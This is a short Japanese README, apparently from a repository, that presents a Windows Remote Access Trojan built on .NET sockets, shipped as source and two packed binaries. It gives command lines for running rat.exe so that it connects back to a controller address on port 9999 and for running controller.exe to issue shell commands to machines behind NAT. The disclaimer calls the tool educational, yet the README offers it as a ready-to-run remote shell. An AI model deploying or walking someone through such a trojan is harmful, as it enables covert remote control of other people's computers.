
Windows リモートアクセス型トロイの木馬 (RAT)
Windows 用 Remote Access Trojan (RAT) - .NET ソケット使用
NAT 内のリモートマシンを Windows のコマンドラインシェルで制御するためのクライアント・サーバーバイナリとソースコード。コアは複数の RAT との通信をサポートしていますが、使用されるコマンドラインインターフェースではそれぞれを区別する機能が限られています。
RAT プロセスの実行ファイルは、教育目的でのみ開発されたため、タスクバーやタスクマネージャーから自身を隠しません。悪意のある目的で使用しないでください。
ソースコードと ILMerge でパッケージ化された 2 つのバイナリが含まれています。
手順:
RAT として動作するコマンドラインでサーバーを起動します (Binaries\rat.exe) -> rat ip=[controller-ip-address] port=[controller-port-default-is-9999]
コントローラーとして動作するコマンドラインでクライアントを起動します (Binaries\controller.exe) -> controller ip=[listen-ip-address] port=[listen-port-default-is-9999]
controller.exe インターフェースからコマンドを発行します